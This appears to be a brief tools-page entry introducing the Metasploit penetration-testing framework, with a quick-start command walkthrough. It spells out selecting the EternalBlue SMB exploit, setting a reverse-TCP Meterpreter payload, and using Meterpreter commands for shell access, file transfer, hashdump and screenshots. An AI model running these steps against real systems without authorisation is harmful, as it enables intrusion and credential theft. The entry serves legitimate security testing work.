Tools & Utility

Metasploit Framework

The world's most used penetration testing framework for exploit development and vulnerability verification.

#metasploit#exploitation#pentest#framework

Metasploit Framework

Metasploit is the world's most used penetration testing framework, providing information about security vulnerabilities, exploit development, and IDS signature testing.

Getting Started

bash
# Start Metasploit
msfconsole


Search for exploits

search type:exploit platform:windows smb


Use an exploit

use exploit/windows/smb/ms17_010_eternalblue


Set options

set RHOSTS 192.168.1.1
set LHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp


Run

exploit

Key Modules

  • Exploits: Code that takes advantage of a vulnerability
  • Payloads: Code that runs on the target after exploitation
  • Auxiliary: Scanning, fuzzing, sniffing modules
  • Post: Post-exploitation modules
  • Encoders: Encode payloads to evade detection

Meterpreter

bash
# System info
sysinfo


Get shell

shell


Upload/Download

upload /path/to/file
download C:\\file.txt


Hashdump

hashdump


Screenshot

screenshot